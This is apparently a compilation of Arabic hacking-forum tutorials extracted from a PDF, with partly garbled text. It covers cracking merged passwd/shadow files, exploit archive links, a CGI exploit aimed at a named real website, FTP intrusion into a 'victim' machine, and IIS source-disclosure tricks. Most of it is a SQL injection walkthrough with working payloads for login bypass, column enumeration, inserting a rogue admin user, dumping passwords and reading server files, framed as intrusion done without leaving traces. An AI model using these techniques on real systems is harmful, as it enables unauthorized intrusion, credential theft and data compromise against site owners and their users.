دائما سوف تواجه كلمة مرور مضلله ،لكن هناك طريقه تسمى Unshadowلحل هذه المشكله !!
إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو )ملف الظل( shadow file
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ،اليك الجدول التالي :
tokenتعني الرمز الذي يوجد في الملف ، passwdوهذا يفيد في تسهيل المهمه ،يعني لو مثل لقيت
علمه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في ، etc/security/passwd/لقد
إستعنت بالجدول السابق ذكره ،مثال على ملف شادو )أكرر ملف شادو هو الملف الذي تخزن فيه كلمة
المرور الصحيحه(
الخطوه الخيره وهي دمج ملف الباسورد passwd fileمع shadow passwdلنحصل على ملف
متكامل ونقدمه الى برامج الكسر السابق ذكرها...
202
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
:/:nobody4:x:65534:65534:SunOS 4.x Nobody
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
نعرف من خلل الجدول السابق ذكره بأن كلمة المرور الصحيحه فيx الموضح واللي هوtoken ومن الـ
etc/shadow/ الدليل
-: ملحظه مهمه
... يعني تربتها لتتعرف عليها برامج الكسر، عليك جعل كل حساب في سطر
أرشيف لثغرات
www.securiteam.com/exploits/archive.html
أرشيف لثغرات
/http://www.ussrback.com
203
أرشيف ثغرات
/http://www.rootshell.com
أرشيف ثغرات
/http://www.ussrback.com
مواقع لثغرات
www.secureroot.com/category/exploits
Warez.com-Underground
/http://www.warez.com
Hacking
((ممتاز لمن يريد البدايه
/http://www.neworder.box.sk
insecure
/http://www.insecure.org
<XMP></BODY></HTML/>
http://public.www.easynet.co.uk/cgi...ail/formmail.pl
،،،انتهى
204
>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<
اخواني عالم الختراق كبير جدا ...وبسيط جدا جدا لنه من صنع البشر
كوني احد العضاء في هذا المنتدى وجديد في باب الختراق عن طريق الثغرات
وحتى تحصل الفائده للجميع ونتعلم من بعض ..فليس عيبا طلب العلم
انما العيب الجهل والتعالي بالعلم نحن نتعلم ل لنجابه العلماء بل
في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس
يبي متابعه وشوية جهد انا ساطرح بعض السئله لعل الخوان المشرفين
من خلل قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور
* لن تخترق الموقع ) (hostاللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي
* لن تخترق السيرفر حتى تمتلك ملف الصلحيات ) (passwdاللي هو حق الحسابات للمواقع المستأجره
عند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي /etc/passwd
احيان يكون اسمه shadowويعني ان كلمة المرور نجمه او اكس او علمة تعجب اما passwdفتأتي
فيه
الكلمه مشفره وتستخدم لها john the ripperاللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين
فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟
واذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام ) (pwdاو )اي صيغه( ؟
بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ لنه كما معروف ان اليونكس
له ست مجلدات
هل يعني ذلك لو ان السيرفر فيه نظام ntاقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس
205
زي اللي موجوده في ntام تختلف واسم الملف يختلف admin.pwdمثل
* بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى
ومن اشهرها ثغرات السي جي اي نسبة للمجلد cgi-binاو ملفات من امتداد cgi
طيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغره php.cgiونريد
تطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثل /http://www.jewish.orgنفعل التالي
الدرس العنوان
انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها
ان ممكن تكون الثغره بمجلد ثاني اسمه scriptsوتصبح الثغره السابقه
http://www.jewish.org/scripts/php.cgi
للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل البلت جافا
اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض.
انتهى،،،
206
>ةةةةة<
>ةةةةةة< ICER :
الدوات المطلوبه :شيل اكاونت ...اذا بحثت في جوجل سوف تجد الكثير من الشيلز
طبعا الناس المحترمه )احمممم( بتركب لينكس او يونيكس و تعيش حياتها و تريح
نفسها...في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي
الخطوات -:
-1ركب الينكس و خش عالنت )مش قلتلك مفيش احسن من اللينكس ( P:
-2ركب الداه nmapمتبعا التالي :
*tar zxvf nmap.tar.gz (1
cd nmap (2
configure && make && make install/. (3
nslookup www.target.com
207
Port State Service
tcp open ftp/21
tcp open smtp/25
tcp open http/80
tcp open sunrpc/111
tcp open auth/113
tcp open printer/515
tcp open unknown/963
tcp open kdm/1024
tcp filtered krb524/4444
tcp open X11/6000
tcp filtered napster/6699
OS guess for host: Linux 2.2.14-2.2.16
(Uptime 0.160 days (since Mon Apr 30 14:51:06 2001
Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
#~:root@IcEr
208
.Guest login ok, access restrictions apply 230
.Remote system type is UNIX
.Using binary mode to transfer files
ftp>by
#~:root@IcEr
209
دي مش موجوده ..يبقى مش حنعرف نكمل الكلم ده
عشان الكسبلويت مش تشتغل ..في هذه الحاله الكسبلويت مش تشتغل ال لو معانا باسورد و يوزر نيم
عشان نخش على الف تي بي بتاع الموقع..
عشان كده لزم تقرا السورس بتاع الكسبلويت..و كل اكسبلويت لها ساينتكس و شغل
خاص بيها..بس المبادئ الساسيه و احده.
انتهى،،،
210
>ةةةةة<
>ةةةةةة< BSD-r00t :
| | * مقدمـــة
| | * اهمية ملف htaccess.
| | * كيفية عمل ملف htaccess.
| | * عمل صفحات errorخاصة
| * منع عرض محتويات المجلد الذي ل يوجد به | index
| | * منع/اتاحة دخول الموقع لشخاص معينة
| | * تحويل من يحاول فتح لينك للينك اخر
| | * عمل الملف .htpasswd
| | *الحماية بواسطه htaccess.
| | * منع اظهار الملف htaccess.
| | * اضافة مستخدمين في الملف
| | * جعل الصفحات تظهر بامتداد اخر
--------------------------------------------------
* مقدمـــة
------------
من اهم وسائل حماية المواقع و اغلق بعض الجزاء فيه بكلمة سر ,و منع بعض الناس من دخل الموقع و
السماح
لغيرهم بالدخول ..هو استخدام الملف htaccess.و الذي يمكن عمل الكثير و الكثير به .
و هذا الملف مخفي و محمي بكلمة سر
211
فاذا كان هناك اي تغير يظهر لك كأن الموقع عليه هذه الثغره .
و يمكنك عمل صفحات ال errorالخاصه ك عن طريق -:
أ -تصميم صفحات ال errorاول
ب -تحميل الصفحات على الموقع
ج -اضافه السطر التابي في الملف htaccess.
ErrorDocument error_num
directory_file
بخيث يكون error_numهو رقم الخطا " الرقام موجود بالسفل " و directory_fileهو مكان
صفحه ال errorالتي
قمت بتصميمها .
ErrorDocument 404 مثال :
/errors/nfound.html
-----------------------
| | Bad Syntax | 400
-----------------------
| | Unauthorized | 401
-----------------------
| | Not Used | 402
-----------------------
| | Forbidden | 403
-----------------------
| | Not Found | 404
-----------------------
212
حيث انا ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هو الي بي الخاص به
و الن قد اتممنا عمل الملف htaccess.و الذي قمنا بعمله و ذلك لكي نستطيع استخدام الملف .
htaccess
للحماية بكلمة سر و يوسر .
* الحماية بواسطه htaccess.
----------------------------
و تعتبر الفائدة الرئيسية للملف حيث انه يمكن منع اي احد من دخول دليل معين في الموقع ال اذا كان معه
كلمة السر و اليوسر نيم ,فيمنكنك عن طريقها عمل منتدى خاص او اي شئ تريد.
فعند وضع الملف htaccess.في اي دليل و حاول احد دخول هذا الدليل او اي جزء يندرج تحته سوف
يطلب منه
كلمة سر و يوسر .
213
و يمكنك عمل ذلك عن طريق اضافة ما يأتي في الملف قبل نسخه في الدليل المراد حمايته --:
AuthUserFile /somewhere/.htpasswd
"AuthName "Enter your user and passed
please
Require valid-user
AuthType Basic
><Files .htaccess
order allow,deny
انتهى،،،
214
>ةةةةة ةة ةةةةة ةةةةة<
>ةةةةةة :ةةةةةة<
FTPهي اختصار لكلمة File Transfer Protocolوتعني بروتوكول نقل الملفات ،وهذه الخدمة هي
احدى تسهيلت TCP/IPالتي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات
FTPالرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم
تشغيل مختلفة وعليه فلديها أشكال Formatsمختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم
به ,FTPوبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفًا في أميركا الى جهازنا .
تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.
لتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالبًا استخدام guestأو anonymousعوضًا
عنهما.
وضعت البرامج هنا للستخدام العام فليس هناك حقوق ملكية لحد ول قيود على استخدامها وتوزيعها
وتعديلها.
يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ول يجوز تعديلها أو بيعها.
يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جميع المميزات ويجب تحطيم النسخ بعد
215
انتهاء مدتها.
:ASCII
:Binary
وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bitsتتراوح بين الصفر و 255وتندرج
الصور والبرامج والملفات المضغوطة تحت هذا النوع.
والفيروسات ل يمكن أن تنتقل عبر ملفات ASCIIكما ليمكن أن تنتقل عبر الصور كصيغ & jpg & gif
bmpوغيرها من امتدادات الصور ول عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 -
wavوغيرها ،وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة
ماتكونexe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :
،b64 - bhxكما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات ،MS Officeلذلك احذر من هذه
الملفات وافحصها دائمًا قبل تشغيلها.
تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر :UNIX
:asciiلنقل ملفات ASCIIالنصية ،وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب
اعادة المر.
:binaryلنقل الملفات الثنائية ،وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة
المر.
216
:dirعرض محتويات الدليل
ل سوف تدخلأول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمث ً
حسابك في Tripodعن طريق ،Unix Shellنكتب أوًل المر ftpمتبوعًا بالوجهة المرادة فيصبحftp :
ftp.tripod.comثم ندخل السم وهو عل سبيل المثال " ،"IronPrivateثم نقوم بادخال الرقم السري
ل "******" .وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unixالمعتادة. وهو مث ً
http://www.pc-worlds.net/lunexx.html
نقل الملفات عن طريق المتصفحات سهل جدًا فما عليك سوى ادخال عنوان الموقع URLويبدأ العنوان
بكلمة ftp://ثم العنوان بدًل من كلمة http://للعناوين العادية ،بعد الدخول الى موقع الـ FTPستأتي
الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لنزاله.
أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة .Client Programsوأفضل
برنامج تابع يمكن استخدامه للنوافذ Windowsهو برنامج .Ws_ftp
ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج ،سيظهر لك مربع حوار Session
Profileوالذي من خلله تقوم بتسجيل الدخول ،اكتب في خانة Profile Nameاسم حساب الدخول؛
على سبيل المثال My Home Page In Tripodواكتب في خانة Host Nameاسم الملقن وفي هذا
المثال هو ftp.tripod.comثم في خانة Host Typeاختر Auto Detectلكي يقوم بالتدقيق
التلقائي في نوع نظام الجهاز المضيف ،بعد ذلك قم بكتابة السم في خانة User IDوهو مث ً
ل
IronPrivateثم الرقم السري في خانة Passwordوسيظهر مخفيًا على هيئة نجوم ****** ,ثم اضغط
.OKكما في الشكل التالي:
217
بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم اليسر
هو جهاز الكمبيوتر لديك والقسم اليمن هو جهاز الكمبيوتر المضيف ،في هذه المرحلة تستطيع جلب أو
ارسال الملفات أو تغيير اسمائها أو حذفها ...الخ .أي تستطيع التحكم في محتويات حسابك على النترنت أو
على جهازك بسهولة فائقة.
Telnetهي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر
ل جهازه وكأنه جزء من ذلك الكمبيوتر البعيد .ويختلف العرض حسب نظام الكمبيوتر المضيف.
مضيف جاع ً
اذا كان الجهاز البعيد يستخدم نظام Windowsفل مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض
الوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالوامر اللزمة.
ل يسمى Telnetيمكنك الدخول عليه بالضغط على قائمة ابدأ Startثم ترفق Windowsبرنامجًا سه ً
تشغيل Runثم اكتب Telnetوستنفتح لك صفحة البدء للبرنامج ..من Connectاختر Remote
.Systemفي صندوق الحوار Connectالذي سيظهر لك اكتب في خانة Host Nameاسم ملقن
الجهاز المضيف ثم اكتب في خانة Portالميناء أو المنفذ ) اذا كان لديك( او اتركه كما هو ،ثم اختر من الـ
، Term Typeان كان لديك وال قم بالتجربة .بعد ذلك اضغط Connectوعندما يتم الربط فستحتاج
لدخال السم والرقم السري .وبعد النتهاء من النقل اختر Disconnectمن قائمة Connectوبعد ذلك
اختر .Exit
انتهى،،،
218
>ةةةةة ةة ةةةةة ةةةةة ةةةةة<
>ةةةةةة< hacker dz :
219
إدا تحصلت على هدا الرد فقد تخطيت خطوة
و نجحت في القتحام
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية العكسية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع التصال مع الضحية
هدي أهم الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق
الوام و شرحها و ارقامها
:Codes: Signification
.Restart marker reply 110
(Service ready in nnn minutes. (nnn est un temps 120
.Data connection already open; transfer starting 125
.File status okay; about to open data connection 150
.Command okay 200
.Command not implemented, superfluous at this site 202
.System status, or system help reply 211
.Directory status 212
220
.File status 213
.Help message 214
.NAME system type 215
.Service ready for new user 220
.Service closing control connection 221
.Data connection open; no transfer in progress 225
.Closing data connection 226
.(Entering passive mode (h1, h2, h3, h4, p1, p2 227
.User logged in, proceed 230
.Requested file action okay, completed 250
.PATHNAME" created" 257
.User name okay, need password 331
.Need account for login 332
.Requested file action pendingfurther information 350
.Service not available, closing control connection 421
.Can't open data connection 425
.Connection closed; transfer aborded 426
Requested file action not taken. (Fichier déjà utilisé par autre 450
(chose
.Requested action aborded: local error processing 451
Requested action not taken. (Pas assez de mémoire pour 452
(exécuter l'action
.Syntax error, command unrecognized 500
.Syntax error in parameters or arguments 501
.Command not implemented 502
.Bad sequence of commands 503
.Command not implemented for that parameter 504
.Not logged in 530
.Need account for storing files 532
Requested action not taken. (Fichier non trouvé, pas d'accès 550
(...,possible
.Requested action aborded: page type unknown 551
.Requested file action aborded 552
(Requested action not taken. (Nom de fichier non attribué 553
،،،انتهى
221
>ةةةةة ةة ةةةةة ةةةةة<
>ةةةةةة< linuxray :
س :في البداية ماهي الس كيو ال ) ( SQL؟؟
الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب
ASPهي صفحات تسحب بياناتها
من قاعدة SQLوصفحات ASPممكن ان تكون كنز من المعلومات لختراق قواعد بيانات SQLوهذا
ماسوف اشير اليه لحقا ،و SQL
تتنصت على البورت 1433
ايضا مااريد ان اخبرك به ان ال SQLقد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على
عدد من الجداول يمكن
ان تتصور كبرقواعد بيانات SQLوالعدد الكبير من البيانات التى تحتويها .
اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ...
هناك طرق عديدة للحصول على User name and Passwdمنها كما اسلف صفحات ال ASP
وملفات اخرى من نوع * sql.هناك ثغرات كثير يمكن
ان تحصل منها على كلمات المرور مثل ثغرة htr.+
كيف تستخدم هذه الثغرة :
http://target/page.asp+.htr
: targetالموقع الهدف
: Pageصفحة asp
: htr.+الثغرة
هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ....اعرف انك سوف تتساءل مالفائدة
اذن منها الفائدة هو
خلف هذه الصفحة البيضاء اذهب الى View Sourceلكي ترى اوامر البرمجة الخاصة ب ASPالتى
ليمكن لك ان تراها في الوضع العادي :مثل
222
>%
<%
-----------------------------------------------------------------
في الكود السابق ترى ان اسم المستخدم هو _LinuxRay
وكلمة السر هي 6666666
-----------------------------------------------------------------
الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ASPمثل التي :
هناك ملف ينتهي بامتداد * inc.هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم
المستخدم وكلمة المرور
اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .
global.asa
global.asa++
beforemilion-global.asa
global.asa-
milion.sql
global-direct.asa
ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين SQL
global.asa+.htr
223
هناك ثغرة قديمة في IIS 3وهي ان تضيف بعد صفحة ASPهذا الرمز data$::كما يلي
file.asp::$data
هذه الثغرة لتعمل ال على IIS 3فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر .
لقد اقتربنا من النهاية ...ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟
هناك عدة برامج تدخل على قاعدة البينات انا استخدم Visual interdev 6.0لكني مازلت افضل
استخدام البرنامج السهل ACCESS 2000
تحتاج فقط لثلث معلومات اسم الموقع او الي بي -اسم المستخدم -كلمة المرور
اضغط في البداية على Test Connectionفي السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه
العبارة Test Connection Succeeded
فمعناه ان التصال بقاعدة البيانات تم بنجاح.
يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :
Select the data base on the server
واضغط على OKاو موافق .
انتهى،،،
224
>ةةةةةة< hish_hish :
أتجهت غالبية المواقع لستخدام صفحات ديناميكيه ومنها ما نحن موجودين فيه (:
وتستخدم قواعد بيانات فيها كم كبير من المعلومات ,
وعن طريق سكربت مكتوب بإحدى لغات الويب الديناميكيه PHPأو ASP
والتي تعمل جمبا إلى جمب مع محركات قواعد البيانات .
SQL Server , MySQL,Oracle
يتم أستخلص المعلومات المطلوبه وترك البقيه
حيث تأخذ معلومات من المستخدم ومن ثم تعالج ويستخدم بعضها في تكون
أوامر الـ SQLليتم أستخلص البيانات أو التأكد من صحة بعض المدخلت لبناء
الصفحة المطلوبه أو قبول المستخدم أو رفضه
دائما يتم طلب أسم مستخدم وكلمة مرور في الصفحات التي تخولك بعمل عمل ل
يقوم به إل من قام صاحب الموقع بإعطائه الصلحيه للقيام بها
كأن يقوم بحذف موضوعي (:أو تثبيته في القائمه ((((:
حيث يتم التأكد من وجود أسم المستخدم في قاعدة البيانات وأن كلمة المرور المعطاه مطابقه لتلك الموجوده
بجانب أسم المستخدم
حيث يتم أخذ معلومه وتضمينها في أمر الـ SQLالذي يقوم بالتأكد من وجودها وصلحيتها
ولكن يجب الحذر عند كتابة سكربت يقوم بتوثيق المستخدم للتأكد من أنه مخول له بالدخول للصفحه المحميه
أم ل
وذلك بالتأكد من نظافة القيم المستقبله من المستخدم وخلوها من أي رموز من شأنها أن تجعل أمر الـ SQL
خاطئ
في بنائه أو القيام بأي أمر غير مسموح به
225
اقتباس:
وفي الخطأ هذا حصلنا على جزء من أمر الـ SQLوأيضا أسم أحد العمده في الجدول
وهو ما يؤكد أمكانية عمل injectللـ SQL Queryالمستخدمه للتحقق صلحية أسم المستخدم وكلمة
المرور المدخله .
إذن لنتكلم عن الـ SQL injectionبشيء من التفصيل
لو كان لدينا سكربت يقوم بالتأكد من صلحية اسم المستخدم وكلمة المرور المدخله من المستخدم قأننا
سنتحقق منها بالطريقة التاليه
:code
عند قيام أحد المسموح لهم بالدخول للصفحة المحميه فأنه يقوم بكل تأكيد بتوثيق نفسه قبل أن يسمح له
بالدخول
فعند قيامه بأدخال أسم المستخدم وكلمة المرور الخاصه به
أسم المستخدم admin :
كلمة المرور t0ps3cr3t :
فإن شكل امر الـ SQLسيصبح بالشكل التالي :
:code
وعند وجود سطر في جدول Userتحقق فيه الشرط وهو أن يكون اسم المستخدم adminوكلمة المرور
t0ps3cr3t
فأن المر سيقوم بإرجاع قيمة TRUEأي أن المستخدم مخول بالدخول .
غير ذلك سيتم إرجاع FALSEوسيتم رفض الدخول
ملحظه :يجب أن يكون لديك ولو القليل من المعرفه بأوامر الـ . SQL
> <field from web formيحل محلها ما أدخله المستخدم في صفحة التحقق من صلحيته
في تجربتنا عندما قمنا بإدخال ' كإسم مستخدم وبالمثل لكلمة المرور فأن أمر الـ SQLأصبح بالشكل
التالي :
:code
226
'=SELECT * from Users WHERE User_Name=' ' ' AND Password
' '
ونلحظ أننا قمنا بإغلق علمة التنصيص الولى وبقي علمة تنصيص لم تغلق بعد
وهو ما أدى لظهور رسالة الخطأ !!
الشرط السابق سيقوم بأختيار أول سطر من الجدول Usersويرجع محتوياته في مصفوفه
وبالتالي في بعض الحالت ستجد أنك قد أستطعت الدخول للصفحة المحميه
ولكن في حالت أخرى ل
لنكمل التفاصيل .....
يجب التنبه لنه ربما يكون الشرط في أمر الـ SQLوهو ما يأتي بعد WHEREيتحقق من عدة أشياء
لذلك نستخدم (two dashes) --ليتم إهمال بقية السطر ,حيث يمكننا الستعاضه عن ما أدخلناه قبل قليل
بالمدخلت التاليه
أسم مستخدم --'blah' OR '1'='1 :
وكذلك كلمة المرور ) في بعض الحالت يمكنك إهمال كتابة كلمة مرور لن --ستهملها لنها تأتي بعد اسم
المستخدم في أمر الـ SQL
توجد طريقه مريحه جدا ومضمونه بحيث أنك لن تحتاج لتخمين أحد أسماء العمده
وهي أستخدام having clause
بالطريقه التاليه
أسم مستخدم 'having 1=1--
حيث سنحصل على رسالة خطأ كالتاليه
'Microsoft OLE DB Provider for ODBC Drivers error '80040e14
227
Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.UserID' is invalid in the select list because it is not
.contained in an aggregate function and there is no GROUP BY clause
نحتاج الن أن نقوم بجمع أكبر قدر ممكن من أسماء العمده في هذا الجدول
: نقوم بإدخال التالي
--(blah' group by (username : أسم مستخدم
: فنحصل على الخطأ التالي
:اقتباس
228
هنا حصلنا على معلومتين وهي أسم الجدول وهو cs_isp_user
وأيضا أسم أحد العمده وهو passwd
نقوم الن بتكرار العمل السابق ولكن بإستخدام اسم العمود الجديد
فنقوم بإدخال أسم المستخدم التالي --(blah' group by (passwd :
فنحصل على الخطأ التالي :
اقتباس:
حصلنا على أسم عمود وهو UserIDوهو نفسه ما قمنا بتخمينه وهو userid
تجدر الشاره إلى أن MS SQL Serverليس حساس لحالة الحرف (:
نلحظ أننا سنكون في حلقه غير منتهيه ول نحصل إل على أسماء الجداول UserIDو passwd
إذن الجدول ل يحوي إل على عمودين وهي التي حصلنا عليها
إذن في الحاله هذه نقوم بأدخال مستخدم جديد للجدول وبعدها نقوم بالدخول بشكل طبيعي من الصفحه
الخاصه بتسجيل الدخول (:
سنقوم بكتابة التالي في خانة أسم المستخدم blah' INSERT INTO :
cs_isp_user(UserID,passwd
( --('VALUES('M_3','hi
حيث سيتم إضافة مستخدم جديد له أسم مستخدم M_3وكلمة مرور hi
وبعدها تستطيع الدخول للصفحة المحميه بهذه البيانات على أنك مخول له بالدخول
في مثالنا )شركة التصالت( أنتهينا من استغلل أمكانية عمل injectلها ولكننا سنكمل الحديث عن طريقه
ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تستطيع الدخول بأي منها دون إضافة
نفسك
وهو المر الذي لن يضع شكوك حول وجود لشخص مشبوه
سنكمل ما بدأناه ولكن بإضافة عمود أخر له السم idوهو رقم تسلسلي لكل مستخدم ) تذكر أنه رقم(
إذن لدينا جدول أسمه user
يحوي العمده التاليه
idوهو رقم صحيح
usernameوهو قيمة نصيه ) القيم النصيه يمكن أن تحوي أرقام( مثال admin1
passwdوهي أيضا قيمه نصيه
نجرب عمل unionلقيمه نصيه وتحويلها إلى قيمة عدديه ) لن يتم التحويل ولكنه سيخرج رساله خطأ
ثمينه جدا(
ندخل اسم المستخدم blah' union SELECT username FROM user :
و سنحصل على رسالة خطأ ل تفيدنا في شيء
رسالة الخطأ هي
اقتباس:
229
Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]All]
queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
.lists
admin/admin.asp, line 13/
230
''80040e07
]Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the
.varchar value 'stupid' to a column of data type int
admin/admin.asp, line 13/
حصلنا على أسم المستخدم وكلمة المرور ويمكننا تسجيل الدخول للصفحة المحميه بدون وجود أي أثر لنا
إل إذا كانت الصفحه المحميه عند الدخول لها تقوم بطباعة بعض المعلومات مثل رقم اليبي لخر شخض قام
بالدخول بإسم المستخدم هذا
عندها فكر بما ستقوم به بنفسك
ستستطيع الستفاده من الـ Stored Procedureإذا كان الـ SQL Serverيعمل على المستخدم sa
أو إذا كان المستخدم الذي يعمل عليه الـ SQL Serverتم السماح له بٍاستخدامها
231
أيضا بقي الشاره إلى أنه بأمكانك قراءة كود ملفات aspالتي يعمل عليها الموقع عن طريق إضافة جدول
جديد ومن ثم نسخ كود صفحة aspووضعه
بعد ذلك بأمكانك الن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي
'bulk insert M_3 from 'c:\InetPub\wwwroot\login
asp.
ولقرائة ما تم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تكلمنا عنها في الموضوع السابق
أسهلها هو عمل unionحيث يتم توليد رسالة خطأ بها ما تم نسخه.
انتهى،،،
أن شاء ال في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الختراق
في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن قلنا
في الدرس الول الى كان عن اختراق الجهزة أنه الى بى هو الباب والبورت هو المفتاح له
بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا
بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى -:
جـ -:الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة
232
التى تخليك تتحول من userالى administratorيعنى من مستخدم الى المدير المتصرف وتتضمن
ويجب
على الدوام معرفة الثغرات المنيه الجديدة وأستثمارها علشان ل يتنبه أصحاب المواقع بيها
وأقرب مثال لهذه الثغرات الضعف المني الذى أكتشف في الباتشى وهو سيرفر يركب على نظام ليونكس
وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والستفاده
منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها
جـ -:من وقت ما أكتشفوا الثغرات كانت نسبة %99من الثغرات تكون سكربتاتها مكتوبه بالغه Cوانته
تحتاج لمعرفة هذه اللغه أو
كما أن هناك العديد من الثغرات يحتاج الى shellحتى انته تتمكن من الستفاده من هذه الثغره أو بمعنى
أخر الضعف
وعلى سبيل المثال بعض الثغرات الموجوده فى PHPتحتاج الى Shell PHPومن هذه الكلم.
وكمان في ثغره من نوع Kernel 2.2.xولكن هذه المرة في نظام تشغيل ليونكس
) ملحظه هذه الثغرات التى تكون باللغة Cتكون سيكربتات توجوده فى الموقع ( وهناك أيضا سيكربتات
أخرى مكتوبة باللغه perl
ولزم فى هذه الحالة تكون انته مركب لوينكس علشان الوامر وأنا أنصحك تركب linux Redhat 7.3
لنه أفضل من الماندريك وأذكر انه الخ بلك هانتر لمن انا سألته أركب الماندريك ول الريد هات قال لى انه
الماندريك صورة مبسطه
233
للريد هات بس غير قابله للتطور وأنه الريدهات أقوى وجزاة ال خير على هذه النصيحة نرجع للموضوع
جـ -:الطريقة مره سهله كلها اوامر عادية في البداية انته سوى هذه المر
